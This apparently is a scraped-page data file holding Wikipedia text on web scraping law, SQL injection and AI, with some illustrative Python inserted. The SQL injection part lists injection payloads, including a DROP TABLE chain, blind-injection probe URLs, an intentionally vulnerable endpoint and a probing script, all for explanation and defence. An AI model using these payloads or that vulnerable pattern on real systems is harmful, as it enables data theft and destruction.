Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's scraping of QVC's site for real-time pricing data. QVC alleged that Resultly "excessively crawled" QVC's retail site (allegedly sending 200-300 search requests to QVC's website per minute, sometimes up to 36,000 requests per minute), which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of its website, which QVC claims was caused by Resultly. On the plaintiff's web site during the period of this trial, the terms-of-use link was displayed among all the links of the site, at the bottom of the page, as on most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor of common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned it to the Ninth Circuit to reconsider in light of the 2021 Supreme Court decision in Van Buren v. United States, which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld its prior decision. 23 The Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court for the Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court.
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving aside a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating terms of use that prohibit data scraping would be a violation of contract law. It would also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
593 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/SQL_injection | In computing, SQL injection is a code injection technique used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). 1 2 SQL injection must exploit a security vulnerability in an application's software, for example, when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database. SQL injection attacks allow attackers to spoof identity, tamper with existing data, cause repudiation issues such as voiding transactions or changing balances, allow the complete disclosure of all data on the system, destroy the data or make it otherwise unavailable, and become administrators of the database server. Document-oriented NoSQL databases can also be affected by this security vulnerability. 3 In a 2012 study, it was observed that the average web application received four attack campaigns per month, and retailers received twice as many attacks as other industries. 4 Discussions of SQL injection, such as a 1998 article in Phrack Magazine, began in the late 1990s. 5 SQL injection was considered one of the top 10 web application vulnerabilities of 2007 and 2010 by the Open Web Application Security Project. 6 In 2013, SQL injection was rated the number one attack on the OWASP top ten. 7 SQL injection is a common security vulnerability that arises predominantly from poor (or missing) input validation. Given that arbitrary SQL code can be supplied, it can be devastating. SQL code can be constructed to extract all information from the target system, alter information, destroy information, and under the right circumstances even gain a remote shell onto the database server itself. 8 This form of injection relies on the fact that SQL statements consist of both data used by the SQL statement and commands that control how the SQL statement is executed. For example, in the SQL statement select * from person where name = 'susan' and age = 2, the string 'susan' is data and the fragment and age = 2 is an example of a command (the value 2 is also data in this example). SQL injection occurs when specially crafted user input is processed by the receiving program in a way that allows the input to exit a data context and enter a command context. This allows the attacker to alter the structure of the SQL statement which is executed. As a simple example, imagine that the data 'susan' in the above statement was provided by user input. The user entered the string susan (without the apostrophes) in a web form text entry field, and the program used string concatenation statements to form the above SQL statement from the three fragments select * from person where name=', the user input of susan, and ' and age = 2. Now imagine that instead of entering susan the attacker entered ' or 1=1; --. The program will use the same string concatenation approach with the three fragments of select * from person where name=', the user input of ' or 1=1; --, and ' and age = 2, and construct the statement select * from person where name='' or 1=1; --' and age = 2. Many databases will ignore the text after the -- string as this denotes a comment.
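As a hedged illustration of the string concatenation just described (not code from the original article), the following Python sketch builds the statement from the same three fragments and shows how the susan input and the ' or 1=1; -- input produce very different SQL:

# Sketch of how string concatenation lets user input become SQL structure.
# The table and column names mirror the example above; illustrative only.
def build_query(user_input):
    # The three fragments described above: prefix, user input, suffix
    return "select * from person where name='" + user_input + "' and age = 2"

print(build_query("susan"))
# select * from person where name='susan' and age = 2

print(build_query("' or 1=1; --"))
# select * from person where name='' or 1=1; --' and age = 2
# The trailing fragment is commented out, so the WHERE clause reduces to 1=1.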
The structure of the SQL command is now select * from person where name='' or 1=1; and this will select all person rows rather than just those named susan whose age is 2. The attacker has managed to craft a data string which exits the data context and enters a command context. A more complex example is now presented. Imagine a program creates a SQL statement using the following string assignment command: var statement = "SELECT * FROM users WHERE name = '" + userName + "';". This SQL code is designed to pull up the records of the specified username from its table of users. However, if the "userName" variable is crafted in a specific way by a malicious user, the SQL statement may do more than the code author intended. For example, setting the "userName" variable as ' OR '1'='1 (or using comments to block the rest of the query; there are three types of SQL comments 9 ) renders a SQL statement such as SELECT * FROM users WHERE name = '' OR '1'='1'; in the parent language. If this code were to be used in an authentication procedure, then this example could be used to force the selection of every data field (*) from all users rather than from one specific user name as the coder intended, because the evaluation of '1'='1' is always true. The following value of "userName" in the statement below would cause the deletion of the "users" table as well as the selection of all data from the "userinfo" table (in essence revealing the information of every user), using an API that allows multiple statements: a';DROP TABLE users; SELECT * FROM userinfo WHERE 't' = 't. This input renders the final SQL statement as follows: SELECT * FROM users WHERE name = 'a';DROP TABLE users; SELECT * FROM userinfo WHERE 't' = 't';. While most SQL server implementations allow multiple statements to be executed with one call in this way, some SQL APIs such as PHP's mysql_query() function do not allow this for security reasons. This prevents attackers from injecting entirely separate queries, but doesn't stop them from modifying queries. Blind SQL injection is used when a web application is vulnerable to a SQL injection, but the results of the injection are not visible to the attacker. The page with the vulnerability may not be one that displays data but will display differently depending on the results of a logical statement injected into the legitimate SQL statement called for that page. This type of attack has traditionally been considered time-intensive because a new statement needed to be crafted for each bit recovered, and depending on its structure, the attack may consist of many unsuccessful requests. Recent advancements have allowed each request to recover multiple bits, with no unsuccessful requests, allowing for more consistent and efficient extraction. 10 There are several tools that can automate these attacks once the location of the vulnerability and the target information has been established. 11 One type of blind SQL injection forces the database to evaluate a logical statement on an ordinary application screen. As an example, a book review website uses a query string to determine which book review to display. So the URL https://books.example.com/review?id=5 would cause the server to run the query SELECT * FROM bookreviews WHERE ID = '5';, from which it would populate the review page with data from the review with ID 5, stored in the table bookreviews. The query happens completely on the server; the user does not know the names of the database, table, or fields, nor does the user know the query string. The user only sees that the above URL returns a book review.
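To make the book-review example concrete, here is a hypothetical sketch of what such a vulnerable server-side handler might look like; the Flask route, the sqlite3 database file, and the bookreviews schema are assumptions made for illustration only:

# Hypothetical vulnerable endpoint: the id parameter is concatenated directly
# into the SQL text, which is exactly what enables the blind injection below.
import sqlite3
from flask import Flask, request

app = Flask(__name__)

@app.route("/review")
def review():
    review_id = request.args.get("id", "")
    conn = sqlite3.connect("books.db")
    # UNSAFE: user input becomes part of the SQL statement itself
    query = "SELECT * FROM bookreviews WHERE ID = '" + review_id + "'"
    rows = conn.execute(query).fetchall()
    conn.close()
    return {"reviews": rows}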
A hacker can load the URLs https://books.example.com/review?id=5' OR '1'='1 and https://books.example.com/review?id=5' AND '1'='2, which may result in the queries SELECT * FROM bookreviews WHERE ID = '5' OR '1'='1'; and SELECT * FROM bookreviews WHERE ID = '5' AND '1'='2'; respectively. If the original review loads with the "1'='1" URL and a blank or error page is returned from the "1'='2" URL, and the returned page has not been created to alert the user the input is invalid, or in other words, has been caught by an input test script, the site is likely vulnerable to an SQL injection attack as the query will likely have passed through successfully in both cases. The hacker may proceed with this query string designed to reveal the version number of MySQL running on the server: https://books.example.com/review?id=5 AND substring(@@version, 1, INSTR(@@version, '.') - 1)=4, which would show the book review on a server running MySQL 4 and a blank or error page otherwise. The hacker can continue to use code within query strings to achieve their goal directly, or to glean more information from the server in hopes of discovering another avenue of attack. 12 13 Second-order SQL injection occurs when submitted values contain malicious commands that are stored rather than executed immediately. In some cases, the application may correctly encode a SQL statement and store it as valid SQL. Then, another part of that application without controls to protect against SQL injection might execute that stored SQL statement. This attack requires more knowledge of how submitted values are later used. Automated web application security scanners would not easily detect this type of SQL injection and may need to be manually instructed where to check for evidence that it is being attempted. An SQL injection is a well-known attack and easily prevented by simple measures. After an apparent SQL injection attack on TalkTalk in 2015, the BBC reported that security experts were stunned that such a large company would be vulnerable to it. 14 Techniques like pattern matching, software testing, and grammar analysis are some common ways to mitigate these attacks. 2 The simplest way to prevent injections is to escape all characters that have a special meaning in SQL. The manual for an SQL DBMS explains which characters have a special meaning, which allows creating a comprehensive blacklist of characters that need translation. For instance, every occurrence of a single quote (') in a string parameter must be prepended with a backslash (\) so that the database understands the single quote is part of a given string, rather than its terminator. PHP provides the mysqli_real_escape_string() function to escape strings according to MySQL semantics; for example, the username and password parameters can be escaped before they are embedded in a SQL query. Depending solely on the programmer to diligently escape all query parameters presents inherent risks, given the potential for oversights in the process. To mitigate this vulnerability, programmers may opt to develop their own abstraction layers to automate the escaping of parameters. 15 Object-relational mapping (ORM) frameworks such as Hibernate and ActiveRecord provide an object-oriented interface for queries over a relational database. Most, if not all, ORMs automatically handle the escaping needed to prevent SQL injection attacks as a part of the framework's query API. However, many ORMs provide the ability to bypass their mapping facilities and emit raw SQL statements; improper use of this functionality can introduce the possibility for an injection attack.
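The boolean-based blind technique described earlier in this passage can be sketched as a simple differential check; the endpoint, parameter name, and payloads below are illustrative assumptions rather than details from the original text:

# Hedged sketch of a boolean-based blind SQL injection check: request the same
# page with an always-true and an always-false condition appended, and compare
# the responses. Identical responses suggest the input is handled safely;
# differing responses suggest the condition reached the database.
import requests

BASE = "https://books.example.com/review"  # placeholder endpoint from the text

def looks_injectable(review_id):
    true_cond = requests.get(BASE, params={"id": review_id + "' AND '1'='1"}, timeout=10)
    false_cond = requests.get(BASE, params={"id": review_id + "' AND '1'='2"}, timeout=10)
    # A page that renders normally for the true condition but comes back blank
    # (or errors) for the false condition behaves as described above.
    return true_cond.text != false_cond.text

print(looks_injectable("5"))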
16 With most development platforms, parameterized statements can be used instead of embedding user input in the statement; the parameters are sometimes called placeholders or bind variables. A placeholder can only store a value of the given type and not an arbitrary SQL fragment. Hence the SQL injection would simply be treated as a strange (and probably invalid) parameter value. In many cases, the SQL statement is fixed, and each parameter is a scalar, not a table. The user input is then assigned (bound) to a parameter. 17 Integer, float, or Boolean string parameters can be checked to determine if their value is a valid representation of the given type. Strings that must adhere to a specific pattern or condition (e.g. dates, UUIDs, phone numbers) can also be checked to determine if said pattern is matched. Limiting the permissions on the database login used by the web application to only what is needed may help reduce the effectiveness of any SQL injection attacks that exploit any bugs in the web application. For example, on Microsoft SQL Server, a database logon could be restricted from selecting on some of the system tables, which would limit exploits that try to insert JavaScript into all the text columns in the database. |
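A minimal sketch of the parameterized-statement approach described above, using Python's built-in sqlite3 module and the earlier person example; the module choice and schema are assumptions for illustration:

# Parameterized statement: the SQL text is fixed and user input is bound to a
# placeholder, so it can only ever be treated as a value, never as SQL syntax.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE person (name TEXT, age INTEGER)")
conn.execute("INSERT INTO person VALUES ('susan', 2)")

user_input = "' or 1=1; --"  # the attack string from the earlier example
rows = conn.execute(
    "SELECT * FROM person WHERE name = ? AND age = ?",  # ? marks are placeholders
    (user_input, 2),
).fetchall()
print(rows)  # [] because the input is compared literally against the name column
conn.close()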
594 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Artificial_intelligence | Artificial intelligence (AI), in its broadest sense, is intelligence exhibited by machines, particularly computer systems. It is a field of research in computer science that develops and studies methods and software that enable machines to perceive their environment and use learning and intelligence to take actions that maximize their chances of achieving defined goals. 1 Such machines may be called AIs. Some high-profile applications of AI include advanced web search engines (e.g., Google Search); recommendation systems (used by YouTube, Amazon, and Netflix); interacting via human speech (e.g., Google Assistant, Siri, and Alexa); autonomous vehicles (e.g., Waymo); generative and creative tools (e.g., ChatGPT, Apple Intelligence, and AI art); and superhuman play and analysis in strategy games (e.g., chess and Go). However, many AI applications are not perceived as AI: "A lot of cutting edge AI has filtered into general applications, often without being called AI because once something becomes useful enough and common enough it's not labeled AI anymore. 2 3 Alan Turing was the first person to conduct substantial research in the field that he called "machine intelligence". 4 Artificial intelligence was founded as an academic discipline in 1956, 5 by those now considered the founding fathers of AI: John McCarthy, Marvin Minksy, Nathaniel Rochester, and Claude Shannon. 6 7 The field went through multiple cycles of optimism, 8 9 followed by periods of disappointment and loss of funding, known as AI winter. 10 11 Funding and interest vastly increased after 2012 when deep learning surpassed all previous AI techniques, 12 and after 2017 with the transformer architecture. 13 This led to the AI boom of the early 2020s, with companies, universities, and laboratories overwhelmingly based in the United States pioneering significant advances in artificial intelligence. 14 The growing use of artificial intelligence in the 21st century is influencing a societal and economic shift towards increased automation, data-driven decision-making, and the integration of AI systems into various economic sectors and areas of life, impacting job markets, healthcare, government, industry, education, propaganda, and disinformation. This raises questions about the long-term effects, ethical implications, and risks of AI, prompting discussions about regulatory policies to ensure the safety and benefits of the technology. The various subfields of AI research are centered around particular goals and the use of particular tools. The traditional goals of AI research include reasoning, knowledge representation, planning, learning, natural language processing, perception, and support for robotics. a General intelligence—the ability to complete any task performable by a human on an at least equal level—is among the field's long-term goals. 15 To reach these goals, AI researchers have adapted and integrated a wide range of techniques, including search and mathematical optimization, formal logic, artificial neural networks, and methods based on statistics, operations research, and economics. b AI also draws upon psychology, linguistics, philosophy, neuroscience, and other fields. 16 The general problem of simulating (or creating) intelligence has been broken into subproblems. These consist of particular traits or capabilities that researchers expect an intelligent system to display. 
The traits described below have received the most attention and cover the scope of AI research. a Early researchers developed algorithms that imitated step-by-step reasoning that humans use when they solve puzzles or make logical deductions. 17 By the late 1980s and 1990s, methods were developed for dealing with uncertain or incomplete information, employing concepts from probability and economics. 18 Many of these algorithms are insufficient for solving large reasoning problems because they experience a "combinatorial explosion": They become exponentially slower as the problems grow. 19 Even humans rarely use the step-by-step deduction that early AI research could model. They solve most of their problems using fast, intuitive judgments. 20 Accurate and efficient reasoning is an unsolved problem. Knowledge representation and knowledge engineering 21 allow AI programs to answer questions intelligently and make deductions about real-world facts. Formal knowledge representations are used in content-based indexing and retrieval, 22 scene interpretation, 23 clinical decision support, 24 knowledge discovery (mining "interesting" and actionable inferences from large databases), 25 and other areas. 26 A knowledge base is a body of knowledge represented in a form that can be used by a program. An ontology is the set of objects, relations, concepts, and properties used by a particular domain of knowledge. 27 Knowledge bases need to represent things such as objects, properties, categories, and relations between objects; 28 situations, events, states, and time; 29 causes and effects; 30 knowledge about knowledge (what we know about what other people know); 31 default reasoning (things that humans assume are true until they are told differently and will remain true even when other facts are changing); 32 and many other aspects and domains of knowledge. Among the most difficult problems in knowledge representation are the breadth of commonsense knowledge (the set of atomic facts that the average person knows is enormous); 33 and the sub-symbolic form of most commonsense knowledge (much of what people know is not represented as "facts" or "statements" that they could express verbally). 20 There is also the difficulty of knowledge acquisition, the problem of obtaining knowledge for AI applications. c An "agent" is anything that perceives and takes actions in the world. A rational agent has goals or preferences and takes actions to make them happen. d 36 In automated planning, the agent has a specific goal. 37 In automated decision-making, the agent has preferences—there are some situations it would prefer to be in, and some situations it is trying to avoid. The decision-making agent assigns a number to each situation (called the "utility") that measures how much the agent prefers it. For each possible action, it can calculate the "expected utility": the utility of all possible outcomes of the action, weighted by the probability that the outcome will occur. It can then choose the action with the maximum expected utility. 38 In classical planning, the agent knows exactly what the effect of any action will be. 39 In most real-world problems, however, the agent may not be certain about the situation they are in (it is "unknown" or "unobservable") and it may not know for certain what will happen after each possible action (it is not "deterministic"). It must choose an action by making a probabilistic guess and then reassess the situation to see if the action worked. 
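A small numeric sketch of the expected-utility rule described above; the actions, outcome probabilities, and utilities are invented purely for illustration:

# Expected utility: for each action, weight the utility of each possible
# outcome by its probability, then pick the action with the highest total.
actions = {
    # action: list of (probability, utility) pairs over possible outcomes
    "take_umbrella": [(0.3, 8), (0.7, 6)],
    "leave_umbrella": [(0.3, -10), (0.7, 10)],
}

def expected_utility(outcomes):
    return sum(p * u for p, u in outcomes)

for action, outcomes in actions.items():
    print(action, expected_utility(outcomes))
best = max(actions, key=lambda a: expected_utility(actions[a]))
print("chosen action:", best)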
40 In some problems, the agent's preferences may be uncertain, especially if there are other agents or humans involved. These can be learned (e.g., with inverse reinforcement learning), or the agent can seek information to improve its preferences. 41 Information value theory can be used to weigh the value of exploratory or experimental actions. 42 The space of possible future actions and situations is typically intractably large, so the agents must take actions and evaluate situations while being uncertain of what the outcome will be. A Markov decision process has a transition model that describes the probability that a particular action will change the state in a particular way and a reward function that supplies the utility of each state and the cost of each action. A policy associates a decision with each possible state. The policy could be calculated (e.g., by iteration), be heuristic, or it can be learned. 43 Game theory describes the rational behavior of multiple interacting agents and is used in AI programs that make decisions that involve other agents. 44 Machine learning is the study of programs that can improve their performance on a given task automatically. 45 It has been a part of AI from the beginning. e There are several kinds of machine learning. Unsupervised learning analyzes a stream of data and finds patterns and makes predictions without any other guidance. 48 Supervised learning requires a human to label the input data first, and comes in two main varieties: classification (where the program must learn to predict what category the input belongs in) and regression (where the program must deduce a numeric function based on numeric input). 49 In reinforcement learning, the agent is rewarded for good responses and punished for bad ones. The agent learns to choose responses that are classified as "good". 50 Transfer learning is when the knowledge gained from one problem is applied to a new problem. 51 Deep learning is a type of machine learning that runs inputs through biologically inspired artificial neural networks for all of these types of learning. 52 Computational learning theory can assess learners by computational complexity, by sample complexity (how much data is required), or by other notions of optimization. 53 Natural language processing (NLP) 54 allows programs to read, write and communicate in human languages such as English. Specific problems include speech recognition, speech synthesis, machine translation, information extraction, information retrieval and question answering. 55 Early work, based on Noam Chomsky's generative grammar and semantic networks, had difficulty with word-sense disambiguation f unless restricted to small domains called "micro-worlds" (due to the common sense knowledge problem 33 ). Margaret Masterman believed that it was meaning and not grammar that was the key to understanding languages, and that thesauri and not dictionaries should be the basis of computational language structure. Modern deep learning techniques for NLP include word embedding (representing words, typically as vectors encoding their meaning), 56 transformers (a deep learning architecture using an attention mechanism), 57 and others. 58 In 2019, generative pre-trained transformer (or "GPT") language models began to generate coherent text, 59 60 and by 2023, these models were able to get human-level scores on the bar exam, SAT test, GRE test, and many other real-world applications. 
61 Machine perception is the ability to use input from sensors (such as cameras, microphones, wireless signals, active lidar, sonar, radar, and tactile sensors) to deduce aspects of the world. Computer vision is the ability to analyze visual input. 62 The field includes speech recognition, 63 image classification, 64 facial recognition, object recognition, 65 object tracking, 66 and robotic perception. 67 Affective computing is an interdisciplinary umbrella that comprises systems that recognize, interpret, process, or simulate human feeling, emotion, and mood. 69 For example, some virtual assistants are programmed to speak conversationally or even to banter humorously; it makes them appear more sensitive to the emotional dynamics of human interaction, or to otherwise facilitate human computer interaction. However, this tends to give na ve users an unrealistic conception of the intelligence of existing computer agents. 70 Moderate successes related to affective computing include textual sentiment analysis and, more recently, multimodal sentiment analysis, wherein AI classifies the affects displayed by a videotaped subject. 71 A machine with artificial general intelligence should be able to solve a wide variety of problems with breadth and versatility similar to human intelligence. 15 AI research uses a wide variety of techniques to accomplish the goals above. b AI can solve many problems by intelligently searching through many possible solutions. 72 There are two very different kinds of search used in AI: state space search and local search. State space search searches through a tree of possible states to try to find a goal state. 73 For example, planning algorithms search through trees of goals and subgoals, attempting to find a path to a target goal, a process called means-ends analysis. 74 Simple exhaustive searches 75 are rarely sufficient for most real-world problems: the search space (the number of places to search) quickly grows to astronomical numbers. The result is a search that is too slow or never completes. 19 "Heuristics" or "rules of thumb" can help prioritize choices that are more likely to reach a goal. 76 Adversarial search is used for game-playing programs, such as chess or Go. It searches through a tree of possible moves and counter-moves, looking for a winning position. 77 Local search uses mathematical optimization to find a solution to a problem. It begins with some form of guess and refines it incrementally. 78 Gradient descent is a type of local search that optimizes a set of numerical parameters by incrementally adjusting them to minimize a loss function. Variants of gradient descent are commonly used to train neural networks. 79 Another type of local search is evolutionary computation, which aims to iteratively improve a set of candidate solutions by "mutating" and "recombining" them, selecting only the fittest to survive each generation. 80 Distributed search processes can coordinate via swarm intelligence algorithms. Two popular swarm algorithms used in search are particle swarm optimization (inspired by bird flocking) and ant colony optimization (inspired by ant trails). 81 Formal logic is used for reasoning and knowledge representation. 
82 Formal logic comes in two main forms: propositional logic (which operates on statements that are true or false and uses logical connectives such as "and", "or", "not" and "implies") 83 and predicate logic (which also operates on objects, predicates and relations and uses quantifiers such as "Every X is a Y" and "There are some Xs that are Ys"). 84 Deductive reasoning in logic is the process of proving a new statement (conclusion) from other statements that are given and assumed to be true (the premises). 85 Proofs can be structured as proof trees, in which nodes are labelled by sentences, and children nodes are connected to parent nodes by inference rules. Given a problem and a set of premises, problem-solving reduces to searching for a proof tree whose root node is labelled by a solution of the problem and whose leaf nodes are labelled by premises or axioms. In the case of Horn clauses, problem-solving search can be performed by reasoning forwards from the premises or backwards from the problem. 86 In the more general case of the clausal form of first-order logic, resolution is a single, axiom-free rule of inference, in which a problem is solved by proving a contradiction from premises that include the negation of the problem to be solved. 87 Inference in both Horn clause logic and first-order logic is undecidable, and therefore intractable. However, backward reasoning with Horn clauses, which underpins computation in the logic programming language Prolog, is Turing complete. Moreover, its efficiency is competitive with computation in other symbolic programming languages. 88 Fuzzy logic assigns a "degree of truth" between 0 and 1. It can therefore handle propositions that are vague and partially true. 89 Non-monotonic logics, including logic programming with negation as failure, are designed to handle default reasoning. 32 Other specialized versions of logic have been developed to describe many complex domains. Many problems in AI (including in reasoning, planning, learning, perception, and robotics) require the agent to operate with incomplete or uncertain information. AI researchers have devised a number of tools to solve these problems using methods from probability theory and economics. 90 Precise mathematical tools have been developed that analyze how an agent can make choices and plan, using decision theory, decision analysis, 91 and information value theory. 92 These tools include models such as Markov decision processes, 93 dynamic decision networks, 94 game theory and mechanism design. 95 Bayesian networks 96 are a tool that can be used for reasoning (using the Bayesian inference algorithm), g 98 learning (using the expectation maximization algorithm), h 100 planning (using decision networks) 101 and perception (using dynamic Bayesian networks). 94 Probabilistic algorithms can also be used for filtering, prediction, smoothing, and finding explanations for streams of data, thus helping perception systems analyze processes that occur over time (e.g., hidden Markov models or Kalman filters). 94 The simplest AI applications can be divided into two types: classifiers (e.g., "if shiny then diamond"), on one hand, and controllers (e.g., "if diamond then pick up"), on the other hand. Classifiers 102 are functions that use pattern matching to determine the closest match. They can be fine-tuned based on chosen examples using supervised learning. Each pattern (also called an "observation") is labeled with a certain predefined class. 
All the observations combined with their class labels are known as a data set. When a new observation is received, that observation is classified based on previous experience. 49 There are many kinds of classifiers in use. 103 The decision tree is the simplest and most widely used symbolic machine learning algorithm. 104 K-nearest neighbor algorithm was the most widely used analogical AI until the mid 1990s, and Kernel methods such as the support vector machine (SVM) displaced k-nearest neighbor in the 1990s. 105 The naive Bayes classifier is reportedly the "most widely used learner" 106 at Google, due in part to its scalability. 107 Neural networks are also used as classifiers. 108 An artificial neural network is based on a collection of nodes also known as artificial neurons, which loosely model the neurons in a biological brain. It is trained to recognise patterns; once trained, it can recognise those patterns in fresh data. There is an input, at least one hidden layer of nodes and an output. Each node applies a function and once the weight crosses its specified threshold, the data is transmitted to the next layer. A network is typically called a deep neural network if it has at least 2 hidden layers. 108 Learning algorithms for neural networks use local search to choose the weights that will get the right output for each input during training. The most common training technique is the backpropagation algorithm. 109 Neural networks learn to model complex relationships between inputs and outputs and find patterns in data. In theory, a neural network can learn any function. 110 In feedforward neural networks the signal passes in only one direction. 111 Recurrent neural networks feed the output signal back into the input, which allows short-term memories of previous input events. Long short term memory is the most successful network architecture for recurrent networks. 112 Perceptrons 113 use only a single layer of neurons, deep learning 114 uses multiple layers. Convolutional neural networks strengthen the connection between neurons that are "close" to each other—this is especially important in image processing, where a local set of neurons must identify an "edge" before the network can identify an object. 115 Deep learning 114 uses several layers of neurons between the network's inputs and outputs. The multiple layers can progressively extract higher-level features from the raw input. For example, in image processing, lower layers may identify edges, while higher layers may identify the concepts relevant to a human such as digits, letters, or faces. 116 Deep learning has profoundly improved the performance of programs in many important subfields of artificial intelligence, including computer vision, speech recognition, natural language processing, image classification, 117 and others. The reason that deep learning performs so well in so many applications is not known as of 2023. 118 The sudden success of deep learning in 2012 2015 did not occur because of some new discovery or theoretical breakthrough (deep neural networks and backpropagation had been described by many people, as far back as the 